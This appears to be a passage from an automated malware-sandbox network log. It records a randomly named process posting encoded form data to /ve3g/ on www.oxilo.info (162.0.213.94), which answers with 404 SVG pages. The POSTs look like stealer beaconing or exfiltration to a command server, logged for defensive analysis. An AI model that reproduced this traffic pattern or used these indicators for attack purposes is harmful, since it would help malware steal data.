Oct 9, 2024 16:30:43.889429092 CEST	1236	IN	Data Raw: 72 6d 3d 22 6d 61 74 72 69 78 28 31 2e 30 31 35 30 36 38 37 2c 30 2c 30 2c 31 31 2e 31 39 33 39 32 33 2c 2d 31 2e 33 38 39 35 39 34 35 2c 2d 32 36 38 35 2e 37 34 34 31 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c Data Ascii: rm="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263
Oct 9, 2024 16:30:43.889444113 CEST	1236	IN	Data Raw: 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 Data Ascii: e-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914
Oct 9, 2024 16:30:43.889460087 CEST	1236	IN	Data Raw: 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 Data Ascii: 475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433
Oct 9, 2024 16:30:43.889475107 CEST	1236	IN	Data Raw: 34 36 2e 33 33 33 32 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 Data Ascii: 46.33323" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.4
Oct 9, 2024 16:30:43.889492035 CEST	1236	IN	Data Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 33 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 Data Ascii: ;stroke-opacity:1;" /> <path id="path4533" d="m 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.
Oct 9, 2024 16:30:43.889508009 CEST	1120	IN	Data Raw: 2e 32 33 35 36 39 33 2c 32 33 2e 34 38 38 33 35 20 30 2e 32 33 35 36 39 33 2c 33 36 2e 35 35 30 37 32 20 2d 31 30 65 2d 37 2c 31 33 2e 30 36 32 33 38 20 2d 30 2e 31 31 37 38 33 33 2c 32 37 2e 34 33 37 39 36 20 2d 30 2e 30 35 38 39 31 2c 34 35 2e Data Ascii: .235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45.3521 0.05892,17.91413 0.29461,39.36153 0.707091,58.80738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stro
Oct 9, 2024 16:30:43.889688015 CEST	1236	IN	Data Raw: 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 Data Ascii: -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:m
Oct 9, 2024 16:30:43.889714003 CEST	1236	IN	Data Raw: 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 Data Ascii: 29" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />
Oct 9, 2024 16:30:43.895463943 CEST	1236	IN	Data Raw: 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 Data Ascii: stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50008	162.0.213.94	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:30:45.848357916 CEST	776	OUT	POST /ve3g/ HTTP/1.1 Host: www.oxilo.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.oxilo.info Content-Length: 227 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.oxilo.info/ve3g/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 44 52 30 75 73 4b 77 41 63 30 33 47 34 4e 66 72 50 6d 48 70 61 51 32 43 76 6b 49 6c 71 68 62 71 41 47 45 56 4d 53 6b 55 78 54 76 71 6b 66 34 47 79 47 71 34 33 74 48 61 68 71 52 6f 57 6b 34 69 42 55 32 30 47 73 31 55 43 57 54 33 5a 42 62 48 78 56 31 53 62 57 38 34 6f 5a 7a 61 49 46 78 79 5a 75 55 39 2b 70 61 43 4b 43 72 36 31 65 43 58 59 4d 55 42 35 37 51 32 45 45 5a 4c 50 73 4a 79 52 74 69 79 49 65 58 4e 47 6b 2b 37 57 59 54 58 54 76 51 4b 70 55 65 64 4c 6e 4a 47 33 30 76 4d 38 7a 51 6c 51 2f 42 4e 38 2b 4e 42 78 32 53 53 70 6a 76 75 37 36 31 5a 68 59 64 33 6d 6b 66 6d 30 41 31 32 77 37 6b 63 4d 76 37 48 38 38 63 34 2f 42 57 63 78 2f 34 75 39 69 71 6f Data Ascii: 1Dd0AZ=DR0usKwAc03G4NfrPmHpaQ2CvkIlqhbqAGEVMSkUxTvqkf4GyGq43tHahqRoWk4iBU20Gs1UCWT3ZBbHxV1SbW84oZzaIFxyZuU9+paCKCr61eCXYMUB57Q2EEZLPsJyRtiyIeXNGk+7WYTXTvQKpUedLnJG30vM8zQlQ/BN8+NBx2SSpjvu761ZhYd3mkfm0A12w7kcMv7H88c4/BWcx/4u9iqo
Oct 9, 2024 16:30:46.613779068 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 09 Oct 2024 14:30:46 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 16052 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Oct 9, 2024 16:30:46.613826036 CEST	1236	IN	Data Raw: 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 Data Ascii: "stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.015068
Oct 9, 2024 16:30:46.613877058 CEST	448	IN	Data Raw: 2c 2d 33 2e 36 37 32 33 38 36 20 2d 31 2e 30 37 34 38 33 38 2c 2d 39 2e 37 36 30 36 35 37 20 2d 30 2e 33 36 31 38 35 2c 2d 37 2e 35 36 34 37 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d Data Ascii: ,-3.672386 -1.074838,-9.760657 -0.36185,-7.564779 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393p
Oct 9, 2024 16:30:46.613909006 CEST	1236	IN	Data Raw: 35 39 2c 30 2e 31 38 32 35 38 20 63 20 2d 31 2e 39 31 34 36 30 33 2c 2d 30 2e 32 33 36 32 31 20 2d 33 2e 35 30 35 35 39 31 2c 31 2e 31 37 38 30 31 20 2d 34 2e 38 36 31 34 34 34 2c 32 2e 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 Data Ascii: 59,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.1470
Oct 9, 2024 16:30:46.613941908 CEST	1236	IN	Data Raw: 2d 31 33 2e 31 39 37 35 35 35 2c 31 33 2e 33 34 33 33 20 2d 31 38 2e 37 38 31 33 37 39 2c 32 30 2e 30 31 30 34 38 20 2d 35 2e 35 38 33 38 32 33 2c 36 2e 36 36 37 31 39 20 2d 31 30 2e 37 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 Data Ascii: -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.7
Oct 9, 2024 16:30:46.613976002 CEST	448	IN	Data Raw: 32 32 34 39 38 20 63 20 36 2e 38 39 35 38 36 2c 36 2e 34 35 38 33 36 20 31 33 2e 37 39 31 37 2c 31 32 2e 39 31 36 37 20 31 39 2e 39 38 39 35 37 2c 31 39 2e 31 34 35 38 31 20 36 2e 31 39 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 Data Ascii: 22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.2492
Oct 9, 2024 16:30:46.614348888 CEST	1236	IN	Data Raw: 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 Data Ascii: ;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16
Oct 9, 2024 16:30:46.614382982 CEST	1236	IN	Data Raw: 36 2e 36 36 33 35 36 20 31 2e 34 35 38 35 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 Data Ascii: 6.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.115
Oct 9, 2024 16:30:46.614414930 CEST	448	IN	Data Raw: 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: .474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path i
Oct 9, 2024 16:30:46.614804983 CEST	1236	IN	Data Raw: 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 Data Ascii: -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:m
Oct 9, 2024 16:30:46.619083881 CEST	1236	IN	Data Raw: 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 Data Ascii: 29" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50009	162.0.213.94	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:30:48.385113955 CEST	1793	OUT	POST /ve3g/ HTTP/1.1 Host: www.oxilo.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.oxilo.info Content-Length: 1243 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.oxilo.info/ve3g/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 44 52 30 75 73 4b 77 41 63 30 33 47 34 4e 66 72 50 6d 48 70 61 51 32 43 76 6b 49 6c 71 68 62 71 41 47 45 56 4d 53 6b 55 78 54 6e 71 6b 73 41 47 7a 6c 43 34 78 64 48 61 6f 4b 52 72 57 6b 34 76 42 55 4f 77 47 73 35 75 43 55 62 33 66 54 2f 48 31 57 74 53 43 6d 38 34 33 70 7a 58 57 31 78 64 5a 74 38 68 2b 70 4b 43 4b 43 72 36 31 66 79 58 61 64 55 42 71 72 51 78 46 45 5a 66 46 38 4a 57 52 74 37 50 49 65 69 77 47 56 65 37 57 34 6a 58 65 39 6f 4b 30 6b 65 62 49 6e 4a 67 33 30 6a 74 38 7a 63 70 51 38 64 72 38 39 64 42 39 51 54 59 78 58 76 2b 6a 5a 70 38 74 6f 56 48 30 6c 71 4c 2f 6e 5a 5a 30 4c 49 42 54 4e 32 6f 33 49 67 69 79 42 72 4b 72 75 34 49 7a 32 48 6f 6e 56 34 59 54 4c 59 51 46 4b 68 64 42 52 7a 32 4c 64 6b 4a 5a 32 69 56 38 70 47 53 71 32 4a 38 48 6d 74 63 57 69 56 56 64 49 7a 66 32 47 53 44 50 30 49 4d 4e 2b 49 4d 57 4e 4d 46 56 54 44 49 6f 54 56 6b 56 33 34 34 77 2b 4e 70 44 54 79 34 63 78 6b 69 2b 42 75 4a 68 6b 59 73 41 56 54 68 38 54 6d 63 38 69 59 73 48 6a 31 58 76 4a 6e [TRUNCATED] Data Ascii: 1Dd0AZ=DR0usKwAc03G4NfrPmHpaQ2CvkIlqhbqAGEVMSkUxTnqksAGzlC4xdHaoKRrWk4vBUOwGs5uCUb3fT/H1WtSCm843pzXW1xdZt8h+pKCKCr61fyXadUBqrQxFEZfF8JWRt7PIeiwGVe7W4jXe9oK0kebInJg30jt8zcpQ8dr89dB9QTYxXv+jZp8toVH0lqL/nZZ0LIBTN2o3IgiyBrKru4Iz2HonV4YTLYQFKhdBRz2LdkJZ2iV8pGSq2J8HmtcWiVVdIzf2GSDP0IMN+IMWNMFVTDIoTVkV344w+NpDTy4cxki+BuJhkYsAVTh8Tmc8iYsHj1XvJnjcnOfxbfTRfWFZ4iRum0tBFTUPu9D0w6l4MCoYfZUNofvS8IOMUYd0/trT1iYSPKbntH4oPmFVc7m7BFrw43z8wfWz2OyCGlJDFppFQo2DOaQGOnl7tVwYFvDQb74CWGo9wfMJVKr8zBQtEDHcTyO8fzKxlRDFLvpTEgVYIxDKMi3XvMdLlu/RpCB5vI4r9S1O831xoI77kNrXnPUzZJmAgf/P+8AmkSMqBd3mFm6C6YcZde1rBp7vlVv426VpbG/FnQRm/t9nJUvvyNaEqNc7RO/XqByPKaeqtMyzIhW26Rfps5TC7fL2NLEepvGyc8zlvuq/3Snnp1Lr350pVtyGSrxx31kkyliF7Xjmbzn3OXfLwo3zovvfWg+ts2sglxHI7u7IeyabeaaADZKvVIhY3v3y6dreXsGNxBO0DeanqZPUDPsckMK1kuCUdBIsWRuXW9ogI9/cOXooTKXh1Nhl63rIJn4//eDMkyYwBcR2fxyohjiQ75IiTrq/+n5+Pv2QZfSDQlJHEs2SWnp05SPKlxjWrQxQ7Qh1BPAT+HE9j49CpakvvpG9LzROnmcVBTCatRhxgnWM8Sbo25U14340FKS4WagvNRBF274gVqTJKZBq9SBL46ljj2Qj5RQFzbk+sF3BWd3OsNLoqZsjgwW6zFMtKL4KXGLd [TRUNCATED]
Oct 9, 2024 16:30:48.999232054 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 09 Oct 2024 14:30:48 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 16052 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Oct 9, 2024 16:30:48.999254942 CEST	224	IN	Data Raw: 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 Data Ascii: "stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transfo
Oct 9, 2024 16:30:48.999284983 CEST	1236	IN	Data Raw: 72 6d 3d 22 6d 61 74 72 69 78 28 31 2e 30 31 35 30 36 38 37 2c 30 2c 30 2c 31 31 2e 31 39 33 39 32 33 2c 2d 31 2e 33 38 39 35 39 34 35 2c 2d 32 36 38 35 2e 37 34 34 31 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c Data Ascii: rm="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263
Oct 9, 2024 16:30:48.999299049 CEST	1236	IN	Data Raw: 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 Data Ascii: e-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914
Oct 9, 2024 16:30:48.999308109 CEST	1236	IN	Data Raw: 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 Data Ascii: 475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433
Oct 9, 2024 16:30:48.999315023 CEST	1236	IN	Data Raw: 34 36 2e 33 33 33 32 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 Data Ascii: 46.33323" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.4
Oct 9, 2024 16:30:48.999324083 CEST	1236	IN	Data Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 33 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 Data Ascii: ;stroke-opacity:1;" /> <path id="path4533" d="m 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.
